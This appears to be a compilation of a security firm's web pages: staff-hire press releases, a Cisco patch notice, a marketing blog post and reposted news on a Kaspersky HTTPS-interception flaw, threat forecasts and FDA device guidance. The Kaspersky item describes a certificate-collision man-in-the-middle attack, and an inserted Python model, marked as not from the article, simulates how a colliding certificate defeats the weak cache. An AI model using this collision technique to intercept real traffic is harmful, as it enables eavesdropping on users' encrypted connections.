Salt Lake City, UT (February 1, 2018) - Secuvant, an independent cyber security risk management and managed detection and response firm, today announced that Greg Johnson has joined the company as Vice President of Sales. Greg has over 20 years of experience covering security strategy, business development and direct sales in the security and compliance/audit spaces and has an amazingly successful track record of consistently hitting targets and increasing revenue year over year. Greg will be working directly with customers using the Secuvant high-touch approach, which enables business through risk management and complete security operational excellence with the Secuvant Cyber7™ process.

"Greg fits into the Secuvant model, culture and objectives like a glove. With his background in security and auditing, and as a very senior advisor to clients, he is going to make a huge impact," said Ryan Layton, CEO of Secuvant. "Our clients are lucky to have Greg working with them, and we are very fortunate to have this kind of talent on our team." Greg will be bringing his expertise in ISO 27001, PCI DSS, HIPAA/HITRUST and excellent relationships to Secuvant to continue the tradition of excellence.

Greg was most recently with A-LIGN as the VP of Business Development, where he delivered amazing results for hundreds of his clients in security auditing, compliance, penetration testing and advisory services. In addition, Greg has held positions at CipherTooth as a Board Advisor, and at Lancera, Access Technology Solutions (Global Access), SecurityMetrics and Novell. Greg holds a BA from Brigham Young University and is also a Payment Card Industry Professional (PCIP).

"From the first time I met the Secuvant team I knew I wanted to be a part of what they were doing," said Greg. "Their approach to the cyber security market is so unique. By focusing on the business side of risk and security and not just tools, Secuvant gets it right. Technology is not security without business priority, process and policy! I also wanted to be a part of this team! From the leadership to the analysts, these are amazing people that I wanted to be working with. Everyone is talking about Secuvant and their approach and I am very excited to be here."

About Secuvant: Secuvant is unique in its product-independent, vendor-agnostic approach to cyber security, uniquely focusing on the Secuvant Cyber-7™ business priorities. Secuvant is one of the fastest growing companies in Utah providing business-driven cyber security solutions to the SMB market, including gap and risk assessments, risk management programs, and a complete managed detection and response service, delivered from its state-of-the-art security operations center. Secuvant provides a complete team, tools, technology and processes, and in most cases, all for less than the cost of hiring internal resources.




Summary: Cisco Systems has released a Security Bulletin for CVE-2018-0101. Cisco has also released free software updates that address the vulnerability described in this advisory.

For detailed information on the vulnerability and how to check whether you are affected, please review the advisory at this link.

Products Affected: This vulnerability affects Cisco ASA Software that is running on the following Cisco products:

  • 3000 Series Industrial Security Appliance (ISA)
  • ASA 5500 Series Adaptive Security Appliances
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • ASA 1000V Cloud Firewall
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4110 Security Appliance
  • Firepower 9300 ASA Security Module
  • Firepower Threat Defense Software (FTD)

What should you do: We recommend you check the versions you are running and, if needed, patch as soon as possible. Your firewalls are the first line of defense for your network.



Beware of VARs posing as Managed Security Service Providers (MSSP)

Cyber security should be a concern for any company, and especially for small and mid-sized businesses (SMBs). But this does not mean that those SMBs should turn to their value-added reseller (VAR) or managed IT service partner (MSP) for help. On the contrary, those partners have a clear motivation: sell you more security tools and IT services. Cyber security is not about the hardware and software tools. Companies that get 80% or 90% of their revenue from reselling vendor tools still have the motivation to sell more tools in order to fund their new foray into security. With shrinking margins for reselling tools, these companies are turning to managed services, including security. This does not make them security experts.

The good news is that the trend is for businesses to turn to a Managed Detection and Response (MDR) provider, which is a great way to reduce costs and risks and get a true security strategy in place. However, if that service is simply a “bolted-on” service that your long-time VAR or MSP is adding in order to capitalize on a hot market, you may be making a mistake. Security is a very deep and technical discipline and takes a clear focus to get right. Spinning up a SIEM tool, collecting logs and installing anti-virus on your endpoints is not complete security.

Another trend for VARs is to resell or use an MSSP white-labeled service under their own logo. This may be a good service from the partner MSSP, but the VAR will typically struggle to add the necessary security expertise and security process for a service they may not know a lot about. They may also use security monitoring to position specific hardware they want to sell you in order to provide the service. In fact, that hardware may be a good control and worth the price, but it needs to be assessed from a risk point of view, not a vendor's. Do not get your security strategy from a security product vendor. When you sell hammers, everything looks like a nail.

So, what should you look for when your business needs help with cyber security and you want to keep costs down, risks under control and need a true security partner that focuses on your business and not their bottom line? Here is a quick list to start:

• Pick an MDR partner that provides cyber security only, and that is their sole focus.

• Pick an Independent MSSP/MDR provider that does not sell any hardware or software tools. They will have your interests in mind when recommending controls and tools you may need.

• Use an MDR partner that treats cyber security as a Business Risk, not just a technical one. It is not about the tools. Make sure risk management is part of the MDR service.

• Use an MDR partner that does gap and risk assessments, tied to industry standards, not just glass watching.

• Use a “high touch” MDR partner. Just getting alerts thrown over to you by email is not effective. You need a true security firm that will be your vCISO advisor.

If your SMB needs some help with cyber security then get an MDR service that includes people, process, technology and risk management. Tools will change, and actually this is one of the reasons you want to consider outsourcing your security to an independent MDR partner, so that you get best of breed coverage that you may not be able to afford otherwise. Don’t jump into security services because of a provider’s appliance, firewall, tool or software. Jump in for the right reason, to enable your business. Beware of a VAR in MSSP clothing. You will be glad you did.





Salt Lake City, UT (November 14, 2017) – Secuvant, an independent cyber security risk management and managed detection and response firm, today announced that Neal Francom has joined the company as its new Global Security Operation Center (SOC) Manager. Neal brings over 20 years of experience in the information and cyber security field, and many more years of experience building successful businesses and programs. Neal will be leading the Secuvant cyberMDR operations practice that delivers unique business-driven co-managed security detection and response services to clients and locations around the world.

“We are incredibly lucky to have Neal lead our SOC. This is not Neal’s first rodeo! His experience is very impressive. Having Neal as part of the Secuvant leadership team shows clients our commitment to excellence and experience,” said Todd Neilson, COO and co-founder of Secuvant. “Neal brings a very unique balance of security leadership experience, team building expertise, and an entrepreneurial spirit to help manage our hyper-growth and process improvement. He is a world-class talent.”

Neal joins Secuvant in his second act after retiring several months ago from the Office of the CISO, in the Information Services and Communications Department of The Church of Jesus Christ of Latter-day Saints. He most recently served as the Information Security and Risk Portfolio Director and Church IT Audit Response Manager. He had also been the Chief of Staff to the CISO and an Assistant CISO over the past 10+ years. He is a seasoned professional with solid IT systems design, cyber security, IT auditing, domestic and international privacy compliance, operations policy/process design, staff planning and training experience.

“I had a number of opportunities after retiring and Secuvant is the most unique security play I have seen,” said Neal. “The business-enabled cyber security platform is not just a sales pitch, it is how we manage our clients’ risk. The Secuvant leaders and SOC team are wonderful to work with and I am excited about the future.”

About Secuvant: Secuvant is unique in its product-independent approach to cyber security, uniquely focusing on the Secuvant Cyber-7™ business priorities. Secuvant is one of the fastest growing companies in Utah providing business-driven cyber security solutions to the SMB market, including gap and risk assessments, risk management programs, and a complete managed detection and response service using its state-of-the-art security operations center. Secuvant provides a complete team, tools, technology and processes, and in most cases for less than the cost of hiring internal resources.




Salt Lake City, UT (August 3, 2017) – Secuvant, an independent cyber security risk management and managed detection and response firm, today announced that Joe Nelson has joined the company as Vice President of Managed Services. Joe has over 20 years of experience in technical project management and IT operations with amazing skills and experience adding efficiencies to complex processes. Joe will be working directly with Secuvant clients to deliver Secuvant’s enterprise grade cyberMDR Managed Detection and Response services along with Secuvant’s unique risk management program based on the Secuvant Cyber-7™.

“Joe brings an amazing operational skill set to Secuvant managed services that will help our clients see the true business value of cyber security,” said Todd Neilson, President and COO of Secuvant. “Joe’s client-facing skills, process automation experience and technical ability are the right combination to deliver on the high-touch model our clients are used to. Joe allows Secuvant to manage our hyper-growth while maintaining an excellent client experience.”

Prior to joining Secuvant, Joe spent over twelve years as an Enterprise Network Service Manager for the LDS Church, managing global network projects, driving excellence into life-cycle programs and mapping service improvements and demand management. Joe has a technical background as an engineer as well, having spent time at Cutthroat Communications and Avalanche Net Wireless.

“This is a great opportunity for me to join a fast-paced, fast-growing company in the dynamic cyber security space,” said Joe. “Secuvant has something special and unique in how we offer security services that is based on business risk, and not just throwing tools at the problem. I am looking forward to working with Secuvant’s current clients to achieve excellence using the Cyber-7™ methodology, along with helping new companies get real business value as they join Secuvant’s managed services.”

About Secuvant: Secuvant is unique in its product-independent, vendor-agnostic approach to cyber security, uniquely focusing on the Secuvant Cyber-7™ business priorities. Secuvant is one of the fasting growing companies in Utah providing business-driven cyber security solutions to the SMB market, including gap and risk assessments, risk management programs, and a complete managed detection and response service, delivered from its state-of-the-art security operations center. Secuvant provides a complete team, tools, technology and processes, and in most cases, all for less than the cost of hiring internal resources.

# # #

If you would like more information about this topic, please contact Jeff Smith, EVP Business Development at 855-SECUVANT or email at




Salt Lake City, UT (July 27, 2017) – Secuvant, an independent cyber security risk management and managed detection and response firm, today announced that Matt Sorensen has joined the company as its new Chief Information Security Officer and Vice President of Risk Management. Matt brings 17 years of security experience, over 17 professional certifications in cyber security and 6 years as an Attorney to Secuvant. Sorensen will be leading the Secuvant cyberRPM practice that is focused on bringing real value to businesses through Secuvant’s unique Cyber-7™ risk management methodology.

“Having someone as skilled and well respected as Matt join the Secuvant management team is nothing short of incredible,” said Ryan Layton, CEO and co-founder of Secuvant. “Matt has a very unique combination that is rare to find in cyber security, that being business, legal and technical. He has proven to many businesses and their executives that he is the go-to guy when it comes to cyber risk advisory, and now he can add the Secuvant Cyber-7 methodology that just puts client benefits over the top.”

Prior to joining Secuvant, Matt was an attorney with Holland and Hart in Salt Lake City, focused on managing data breach events, overseeing incident response and investigation teams for clients and helping commercial data breach victims prepare civil claims against negligent data custodians and processors. In addition, Matt has worked for the LDS Church as an IT Compliance Officer, for US Bank and Bank of America in information security roles, and in KPMG’s risk advisory practice. “Secuvant starts by helping executives understand that security is a business risk and not just a technical one,” said Matt. “I am excited to deliver value to our clients using the Cyber-7™ process, which is like nothing I’ve seen before. That is what attracted me to Secuvant. The way they help businesses address growing security threats while enabling revenue and lowering risks and costs is unique in the marketplace.”

About Secuvant: Secuvant is unique in its product-independent, vendor-agnostic approach to cyber security, uniquely focusing on the Secuvant Cyber-7™ business priorities. Secuvant is one of the fastest growing companies in Utah providing business-driven cyber security solutions to the SMB market, including gap and risk assessments, risk management programs, and a complete managed detection and response service, delivered from its state-of-the-art security operations center. Secuvant provides a complete team, tools, technology and processes, and in most cases all for less than the cost of hiring internal resources.



Why Automation isn't everything in Cyber Security

Everything is becoming more automated, but what does this really mean or look like for SecOps? How do you evolve with automation while still keeping your analysts?


By Kumar Saurabh, Contributor, CSO

With the latest advancements in automation and AI, many CISOs are recognizing the potential for automation to transform security operations. Given the way many technology vendors hype their solutions, you could be forgiven for thinking humans should be removed from security flows to the greatest extent possible. But, you would be wrong!

On the contrary, security analysts are not only an important part of the security process, they are THE most important part. So, when you think of automation, you should think of it not as a way of replacing security analysts, but rather as a way of empowering them to do more of what they do best. This is an important distinction.

More automation does not mean a smaller analyst role

The fact is, automation is not a panacea. Certainly, the early and rudimentary forms of automation our industry has seen in the past decade have fallen short of their promise. SIEM systems allow you to collect lots of log data, but the growth in data means ever-increasing amounts of backlog to process. Those same systems, with their inflexible, rules-based approach to threat detection, overwhelm analysts with torrents of false positives.

To make things worse, there are still far too many false negatives and intrusions that get by undetected. No matter what an automation vendor tells you, humans are still the absolute best at identifying previously unknown threats. However, we just can’t do it at scale.

Solving the cybersecurity crisis can’t start with the assumption humans should be automated out of the system - in fact, it should be quite the opposite. In an ideal configuration, human analysts are at the center of everything, supported with advanced automation tools that can make sense of the torrents of data being generated and allowing them to make the types of nuanced decisions that will take a very long time to yield to technology.

Uniting analyst and machine

Some new generation solutions are purely focused on AI and machine learning. The promise is you turn it on in your environment and after a few days of the system learning on its own, it will be able to detect all the bad stuff. However, these systems suffer from a fatal flaw: missing the business context, adaptability and explainability needed to be truly effective.

What do human analysts know better than any system or, more importantly, any intruder? They know their own environment and the enterprise context, as well as having an intuition about how their system operates and what is normal versus what is questionable. Humans also adapt quickly to fast changing conditions and can always explain why they did something. On the other hand, humans cannot scale and could struggle with mistakes and inconsistencies. Machines, as we know, are exponentially faster and consistent.

The ideal system is still one that unites analyst and machine, augmenting the intelligence of a security analyst with the automation scale of a machine. To achieve this, we need the right kind of automation.

There are different types of automation. As explained by Harvard Business Review, basic robotic process automation handles routine and repeatable tasks, and can only scale some of the motions of an analyst, but cannot scale intelligence. Cognitive automation, on the other hand, can handle decision making around the severity of an alert by evaluating the full context of all data surrounding an event. Cognitive automation by itself, however, is not sufficient. To avoid the pitfalls of a “black box,” automation needs to be complemented by analysts’ input and feedback on a continuous basis.

Technology that supports a human-centric approach to automation

Recent technologies now make it possible to play to analysts’ strengths far more effectively. The next generation of automation technology allows analysts to feed their tribal knowledge about context and environment easily into the machine learning system, without requiring large training data sets. In addition to drastically increasing efficacy, this allows a properly designed system to adapt and evolve flexibly as context and environment change. The analyst is in charge and the machine dutifully mimics and executes what the analysts would do, only at extreme scale.

The right automation

Security automation doesn’t mean removing analysts from the equation. Instead, good security automation is about empowering your analysts to force-multiply their efforts, aiding them to be more productive and satisfied in their jobs, and freeing them to tackle the most challenging threats. With the right technologies and processes in place, your SecOps dream team can become a tag team of expert human security analysts plus virtual security analysts powered by cognitive automation.



HTTPS scanning in Kaspersky exposed users to MITM attacks

By Lucian Constantin

Security vendor Kaspersky Lab has updated its antivirus products to fix an issue that exposed users to traffic interception attacks.

The problem was found by Google vulnerability researcher Tavis Ormandy in the SSL/TLS traffic inspection feature that Kaspersky Anti-Virus uses to detect potential threats hidden inside encrypted connections.

Like other endpoint security products, Kaspersky Anti-Virus installs a self-signed root CA certificate on computers and uses it to issue "leaf," or interception, certificates for all HTTPS-enabled websites accessed by users. This allows the product to decrypt and then re-encrypt connections between local browsers and remote servers.

Ormandy found that whenever the product generates an interception certificate it calculates a 32-bit key based on the serial number of the original certificate presented by the website and caches this relationship. This allows the product to present the cached leaf certificate when the user visits the same website again instead of regenerating it.

The problem, according to Ormandy, is that a 32-bit key is very weak and an attacker could easily craft a certificate that matches the same key, creating a collision.

He described a possible attack as follows: "Mallory wants to intercept traffic, for which the 32bit key is 0xdeadbeef. Mallory sends you the real leaf certificate for, which Kaspersky validates and then generates its own certificate and key for. On the next connection, Mallory sends you a colliding valid certificate with key 0xdeadbeef, for any commonName (let's say Now Mallory redirects DNS for to, Kaspersky starts using their cached certificate and the attacker has complete control of"

This implies that the attacker -- Mallory in Ormandy's example -- has a man-in-the-middle position on the network that allows him to redirect the user accessing via DNS to a rogue server under his control. That server hosts and presents a certificate for a domain called

Under normal circumstances the browser should display a certificate error, because the certificate for does not match the domain accessed by the client. However, since the browser will actually see the interception certificate generated by Kaspersky Anti-Virus for, and not the original one, it will establish the connection without any error.

The 32-bit key is so weak that certificate collisions would also occur naturally during normal browsing. For example, Ormandy found that the valid certificate used by has the same 32-bit key calculated by Kaspersky Anti-Virus as the certificate for

According to the researcher, Kaspersky Lab pointed out that there is an additional check being performed on the domain name in addition to the 32-bit key. This makes attacks harder, but not impossible.
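A constructed model of the cache-key defect described above, added here and not code from the article or from Kaspersky: the article does not say how the 32-bit key was derived from the serial, so the low 32 bits of the serial stand in for it, and the host names and serial values are made up. It contrasts a cache keyed only by a 32-bit value with one keyed by the full certificate fingerprint bound to the requested host, and computes how often 32-bit collisions occur by chance during normal browsing.

```python
"""Why a 32-bit cache key is not a certificate identity (constructed example).

Not Kaspersky code. The article does not say how the 32-bit key was
derived from the serial, so weak_key() truncates the serial to its low
32 bits as a stand-in for any 32-bit function of the serial alone.
"""
import hashlib
import math
from dataclasses import dataclass
from typing import Dict, Union


@dataclass(frozen=True)
class Certificate:
    """Minimal stand-in for an origin server's leaf certificate."""
    common_name: str
    serial: int

    def der(self) -> bytes:
        # Surrogate for the DER encoding; real code hashes the real DER bytes.
        return f"{self.common_name}|{self.serial:x}".encode()


def weak_key(cert: Certificate) -> int:
    """Flawed scheme: 32 bits derived from the serial number alone."""
    return cert.serial & 0xFFFFFFFF


def strong_key(cert: Certificate, requested_host: str) -> str:
    """Hardened scheme: the full SHA-256 fingerprint of the origin
    certificate, bound to the host name the client actually requested."""
    fingerprint = hashlib.sha256(cert.der()).hexdigest()
    return f"{requested_host.lower()}|{fingerprint}"


class InterceptionCache:
    """Cache of interception ('leaf') certificates minted by the proxy.

    leaf_for() models one TLS interception: the proxy validates the origin
    certificate, mints a leaf for that certificate's common name, and
    caches it so the next visit can reuse it without re-issuing.
    """

    def __init__(self, hardened: bool) -> None:
        self.hardened = hardened
        self._leaves: Dict[Union[int, str], str] = {}

    def _key(self, cert: Certificate, host: str) -> Union[int, str]:
        return strong_key(cert, host) if self.hardened else weak_key(cert)

    def leaf_for(self, host: str, cert: Certificate) -> str:
        """Return the leaf certificate the browser will be shown for `host`."""
        key = self._key(cert, host)
        if key not in self._leaves:
            self._leaves[key] = f"leaf:CN={cert.common_name}"
        return self._leaves[key]


def birthday_collision_probability(n_certificates: int, key_bits: int = 32) -> float:
    """Probability that at least two of n independent keys collide
    (birthday bound), i.e. how often collisions occur during normal browsing."""
    pairs = n_certificates * (n_certificates - 1) / 2
    return 1.0 - math.exp(-pairs / 2 ** key_bits)


def replay_second_visit(hardened: bool) -> str:
    """Two visits to bank.example (constructed name).

    Visit 1 presents the genuine certificate and populates the cache.
    Visit 2 presents a different, validly issued certificate for another
    name whose serial happens to collide in the low 32 bits. The weak
    cache hands back the leaf minted for bank.example, so the browser
    sees no name mismatch; the hardened cache mints a fresh leaf for the
    certificate's real name and the browser's host check fails as it should.
    """
    cache = InterceptionCache(hardened)
    genuine = Certificate("bank.example", 0x0100DEADBEEF)
    cache.leaf_for("bank.example", genuine)
    colliding = Certificate("other.example", 0x0200DEADBEEF)
    return cache.leaf_for("bank.example", colliding)


if __name__ == "__main__":
    print("weak cache :", replay_second_visit(hardened=False))
    print("hardened   :", replay_second_visit(hardened=True))
    for n in (10_000, 100_000):
        p = birthday_collision_probability(n)
        print(f"P(collision among {n} certs, 32-bit key) = {p:.3f}")
```

With a 32-bit key, roughly 100,000 distinct certificates already give about a two-in-three chance of at least one accidental collision, which is why the article notes collisions occurring naturally during normal browsing.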

"We were able to come up with alternative attacks that still worked and Kaspersky resolved it quickly," Ormandy said in an advisory made public Wednesday. The company fixed the issue on Dec. 28, he said.

Security vendors justify their SSL/TLS interception practices through a legitimate need to protect users from all threats, including those served over HTTPS. However, their implementations have often resulted in security issues. That's because performing certificate validation correctly is not easy and is something that browser vendors themselves have perfected over many years.



4 Information Security Events that will Dominate 2017

By Thor Olavsrud

As with previous years, 2016 saw no shortage of data breaches. Looking ahead to 2017, the Information Security Forum (ISF), a global, independent information security body that focuses on cyber security and information risk management, forecasts businesses will face four key global security threats in 2017.

"2016 certainly lived up to expectations," says Steve Durbin, managing director of the ISF. "We saw all sorts of breaches that just seemed to get bigger and bigger. We lurched from one to another. We always anticipate some level of it, but we never anticipate the full extent. I don't think anybody would have anticipated some of the stuff we've seen of late in terms of the Russians getting involved in the recent elections."

The ISF says the top four global security threats businesses will face in 2017 are the following:

  1. Supercharged connectivity and the IoT will bring unmanaged risks.
  2. Crime syndicates will take quantum leap with crime-as-a-service.
  3. New regulations will bring compliance risks.
  4. Brand reputation and trust will be a target.

"The pace and scale of information security threats continues to accelerate, endangering the integrity and reputation of trusted organizations," Durbin says. "In 2017, we will see increased sophistication in the threat landscape with threats being tailored to their target's weak spots or threats mutating to take account of defenses that have been put in place. Cyberspace is the land of opportunity for hacktivists, terrorists and criminals motivated to wreak havoc, commit fraud, steal information or take down corporations and governments. The solution is to prepare for the unknown with an informed threat outlook. Better preparation will provide organizations of all sizes with the flexibility to withstand unexpected, high-impact security events."

The top four threats identified by the ISF are not mutually exclusive. They can combine to create even greater threat profiles.

Supercharged connectivity and the IoT bring unmanaged risks

Gigabit connectivity is on the way, and it will enable the internet of things (IoT) and a new class of applications that will exploit the combination of big data, GPS location, weather, personal health monitoring devices, industrial production and much more. Durbin says that because connectivity is now so affordable and prevalent, we are embedding sensors everywhere, creating an ecosystem of embedded devices that are nearly impossible to secure.

Durbin says this will raise issues beyond privacy and data access: It will expand the threat landscape exponentially.

"The thing for me with 2017 is I describe it as an 'eyes-open stance' we need to take," Durbin says. "We're talking about devices that never ever had security designed into them, devices that are out there gathering information. It's relatively simple to hack into some of these things. We've seen some moves, particularly in the U.S., to encourage IoT manufacturers to engineer some level of security into their devices. But cost is an issue, and they're designed to link."

Durbin believes many organizations are unaware of the scale and penetration of internet-enabled devices and are deploying IoT solutions without due regard to risk management and security. That's not to say organizations should pull away from IoT solutions, but they do need to think about where connected devices are used, what data they have access to and then build security with that understanding in mind.

"Critical infrastructure is one of the key worry areas," Durbin says. "We look at smart cities, industrial control systems — they're all using embedded IoT devices. We have to make sure we are aware of the implications of that."

"You're never going to protect the whole environment, but we're not going to get rid of embedded devices," he adds. "They're already out there. Let's put in some security that allows us to respond and contain as much as possible. We need to be eyes open, realistic about the way we can manage the application of IoT devices."

Crime syndicates take quantum leap with crime-as-a-service

For years now, Durbin says, criminal syndicates have been operating like startups. But like other successful startups, they've been maturing and have become increasingly sophisticated. In 2017, criminal syndicates will further develop complex hierarchies, partnerships and collaborations that mimic large private sector organizations. This, he says, will facilitate their diversification into new markets and the commoditization of their activities at the global level.

"I originally described them as entrepreneurial businesses, startups," Durbin says. "What we're seeing is a whole maturing of that space. They've moved from the garage to office blocks with corporate infrastructure. They've become incredibly good at doing things that we're bad at: collaborating, sharing, working with partners to plug gaps in their service."

And for many, it is a service offering. While some organizations have their roots in existing criminal structures, other organizations focus purely on cybercrime, specializing in particular areas ranging from writing malware to hosting services, testing, money mule services and more.

"They're interested in anything that can be monetized," Durbin says. "It doesn't matter whether it's intellectual property or personal details. If there is a market, they will go out and collect that information."

He adds that rogue states take advantage of some of these services and notes the ISF expects the resulting cyber incidents in the coming year will be more persistent and damaging than organizations have experienced previously.

New regulations bring compliance risks

The ISF believes the number of data breaches will grow in 2017, and so will the volume of compromised records. The data breaches will become far more expensive for organizations of all sizes, Durbin says. The costs will come from traditional areas such as network clean-up and customer notification, but also from newer areas like litigation involving a growing number of partners.

In addition, public opinion will pressure governments around the world to introduce tighter data protection legislation, which in turn will introduce new and unforeseen costs. Reform is already on the horizon in Europe in the form of the EU General Data Protection Regulation (GDPR) and the already-in-effect Network Information Security Directive. Organizations conducting business in Europe will have to get an immediate handle on what data they are collecting on European individuals, where it's coming from, what it's being used for, where and how it's being stored, who is responsible for it and who has access to it. Organizations that fail to do so and are unable to demonstrate security by design will be subject to potentially massive fines.

"The challenge in 2017 for organizations is going to be two-fold," Durbin says. "First is to keep abreast of the changes in regulations across the many, many jurisdictions you operate in. The second piece is then how do you, if you do have clarity like the GDPR, how do you ensure compliance with that?"

"The scope of it is just so vast," he adds. "You need to completely rethink the way you collect and secure information. If you're an organization that's been doing business for quite some time and is holding personally identifiable information, you need to demonstrate you know where it is at every stage in the lifecycle and that you're protecting it. You need to be taking reasonable steps even with your third party partners. No information commission I've spoken to expects that, come May 2018, every organization is going to be compliant. But you need to be able to demonstrate that you're taking it seriously. That and the nature of the information that goes missing is going to determine the level of fine they levy against you. And these are big, big fines. The scale of fine available is in a completely different realm than anyone is used to."

Brand reputation and trust are a target

In 2017, criminals won't just be targeting personal information and identity theft. Sensitive corporate information and critical infrastructure have a bull's eye painted on them. Your employees, and their ability to recognize security threats and react properly, will determine how this trend affects your organization.

"With attackers more organized, attacks more sophisticated and threats more dangerous, there are greater risks to an organization's reputation than ever before," Durbin says. "In addition, brand reputation and the trust dynamic that exists amongst customers, partners and suppliers have become targets for cybercriminals and hacktivists. The stakes are higher than ever, and we're no longer talking about merely personal information and identity theft. High-level corporate secrets and critical infrastructure are regularly under attack, and businesses need to be aware of the more important trends that have emerged in the past year, as well as those we forecast in the year to come."

While most information security professionals will point to people as the weakest link in an organization's security, that doesn't have to be the case. People can be an organization's strongest security control, Durbin says, but that requires altering how you think about security awareness and training.

Rather than just making people aware of their information security responsibilities and how they should respond, Durbin says the answer is to embed positive information security behaviors that will cause employees to develop "stop and think" behavior and habits.

"2017 is really about organizations having to wake up to the fact that people do not have to be the weakest link in the security chain," Durbin says. "They can be the strongest link if we do better about understanding how people use technology, the psychology of human behavior."

Successfully doing so requires understanding the various risks faced by employees in different roles and tailoring their work processes to embed security processes appropriate to their roles.



New Cybersecurity Guidelines for Medical Devices Tackle Emerging Threats

From: The Verge By: Rachel Becker

Today, the US Food and Drug Administration released its recommendations for how medical device manufacturers should maintain the security of internet-connected devices, even after they’ve entered hospitals, patient homes, or patient bodies. Unsecured devices can allow hackers to tamper with how much medication is delivered by the device — with potentially deadly results.


First issued in draft form last January, this guidance is more than a year in the making. The 30-page document encourages manufacturers to monitor their medical devices and associated software for bugs, and patch any problems that occur. But the recommendations are not legally enforceable — so they’re largely without teeth.

The FDA has been warning the healthcare industry for years that medical devices are vulnerable to cyberattacks. It’s a legitimate concern: researchers have managed to remotely tamper with devices like defibrillators, pacemakers, and insulin pumps. In 2015, the FDA warned hospitals that the Hospira infusion pump, which slowly releases nutrients and medications into a patient’s body, could be accessed and controlled through the hospital’s network. That’s dangerous to patients who could be harmed directly by devices altered to deliver too much or too little medication. It also means poorly-secured devices could give hackers access to hospital networks that store patient information — a situation that’s ripe for identity theft.

“In fact, hospital networks experience constant attempts of intrusion and attack, which can pose a threat to patient safety,” says Suzanne Schwartz, the FDA’s associate director for science and strategic partnerships, in a blog post about the new guidelines. “And as hackers become more sophisticated, these cybersecurity risks will evolve.”


The FDA issued an earlier set of recommendations in October 2014, which recommended ways for manufacturers to build cybersecurity protections into medical devices as they’re being designed and developed. Today’s guidance focuses on how to maintain medical device cybersecurity after devices have left the factory. The guidelines lay out steps for recognizing and addressing ongoing vulnerabilities. And they recommend that manufacturers join together in an Information Sharing and Analysis Organization (ISAO) to share details about security risks and responses as they occur.

Most patches and updates intended to address security vulnerabilities will be considered routine enhancements, which means manufacturers don’t have to alert the FDA every time they issue one. That is, unless someone dies or is seriously harmed because of a bug — then the manufacturer needs to report it. Dangerous bugs identified before they harm or kill anyone won’t have to be reported to the FDA as long as the manufacturer tells customers and device users about the bug within 30 days, fixes it within 60 days, and shares information about the vulnerability with an ISAO.

This attempt to secure medical devices is just the beginning, says Eric Johnson, a cyber security researcher and dean of the Vanderbilt University business school, in an email to The Verge. The FDA’s Schwartz agrees, writing in a blog post: “This is clearly not the end of what FDA will do to address cybersecurity.”



What 2017 Has In Store for Cybersecurity

From: CSO Online By: Gage Skidmore

There is much uncertainty surrounding the security industry for 2017, and according to experts in the field, a lot of the trepidation is directly connected to what the nation’s next president will do.

Here's what security vendors and analysts are predicting for the year ahead.

John B Wood, CEO of Telos Corporation, cites a need for cooperation between the government and the private sector. President-elect Donald Trump took a break from his “thank you” tour to meet with tech executives to smooth over a contentious time between the two sides during his campaign.

“President-elect Trump has been vocal about the need for a stronger and more aggressive cyber security posture, and I’m confident that he’ll work with leading members of Congress. Many non-political cyber experts throughout the government, various agency CISOs and [Federal Chief Information Security Officer] General Touhill will also be great resources to further refine cyber security policies to protect U.S. interests in the face of constantly changing threats,” Wood said.

He also noted the renewed focus on U.S. Cyber Command. The President-elect has promised to eliminate the threat of defense sequestration and to spend more on the military. “This needs to include working to roll back the budget caps for defense spending and providing additional resources for cyber security, including more money for U.S. Cyber Command, which I believe is grossly underfunded,” Wood added.

Speaking of funding, Wood does not believe that a change of administration will automatically lead to a change in regulatory policy.

“Although there will certainly be a big push by the Trump administration to roll back or modify overly burdensome regulations, I don’t see this affecting cybersecurity regulations, like the NIST Cyber Security Framework that has been developed in consultation with the private sector,” he commented.

Reuven Harrison, CTO and co-founder of Tufin, a provider of network security policy orchestration solutions for enterprise cybersecurity, said the thought of a Trump administration inevitably failing to uphold regulations will keep IT departments tossing and turning at night. “If Trump implements his deregulation promises, and penalties for non-compliance with industry-wide security regulations are relaxed, security teams will need to be self-disciplined to maintain a high level of security by turning to outside resources for security best practices,” he said.

Carson Sweet, co-founder and CTO at CloudPassage, said privacy will take center stage over security.

“Trump’s administration will create a fundamental shift in concerns as it pertains to security. There’s a new sheriff in town, and many posit that he has less regard for privacy concerns than the current administration. Case in point, Trump supported the FBI in its battle with Apple over iPhone privacy and security,” Sweet stated. “If this new administration demonstrates in their policies a value for law enforcement and intelligence access over citizens’ privacy, they’ll double or triple down on the government’s right to inspect data. The impact of such a reality would extend to the use of online services, cloud providers, even personal computing devices and IoT.”

What that impact would be is very hard to know, but it’s safe to bet that it won’t be positive, he said. The wars around PGP and personal encryption come to mind (anyone remember the Clipper chip?).

John Bambenek, threat systems manager at Fidelis Cybersecurity, said he never would have predicted last year that we would be talking about the DNC and hacking of elections.

“Ransomware will be on the upswing and evolve in new unforeseen ways. It will be more targeted and focus on more valuable targets as we saw with healthcare. And it will continue to attack new, more damaging industries like we recently witnessed with San Francisco BART and Muni,” he said.

While 2016 found the election under scrutiny because of alleged hacking by foreign powers, 2017 will continue the trend of identity theft and ransomware.

Forrester predicts that within the first 100 days, the new president will face a cybercrisis. The momentum of winning the election gives new presidents the public's support to follow through on key initiatives of their campaigns. However, the 45th president will lose that momentum coming into office by finding the administration facing a cybersecurity incident.

Forrester suggests that the administration prepare for nation-states and ideologies looking to disrupt and degrade. They believe the U.S. should be on the lookout for China, North Korea and Iran.

“Political ideologies use electronic means to both recruit and spread information. DDoS attacks using IoT devices are becoming a common means of disrupting operations for companies or individuals that threat actors disagree with. A company can become a target not just because of its size or global presence but also because of its political donations or public statements. If you’ve never factored geopolitical concerns into your security risk analysis, you ignore them at your own firm’s peril.”

Civilian “casualties” in the Cyber Cold War

Corey Nachreiner, CTO at WatchGuard Technologies, follows Forrester’s way of thinking. “Whether you know it or not, the cyber cold war has started. Nation-states, including U.S., Russia, Israel, and China, have all started both offensive and defensive cyber security operations. Nation-states have allegedly launched malware that damaged nuclear centrifuges, stolen intellectual property from private companies, and even breached other governments' confidential systems. Countries are hacking for espionage, crime investigation, and even to spread propaganda and disinformation.”


He believes 2017 will be much of the same: Behind the scenes, nation-states have been leveraging undiscovered vulnerabilities in their attacks, suggesting that these countries have been finding, purchasing, and hoarding zero-day flaws in software to power their future cyber campaigns.

“In other words, the nation-state cyber cold war is an arms race to discover and hoard software vulnerabilities — often ones in the private software we all use every day,” he said.



Experts Predict 2017's Biggest Cybersecurity Threats

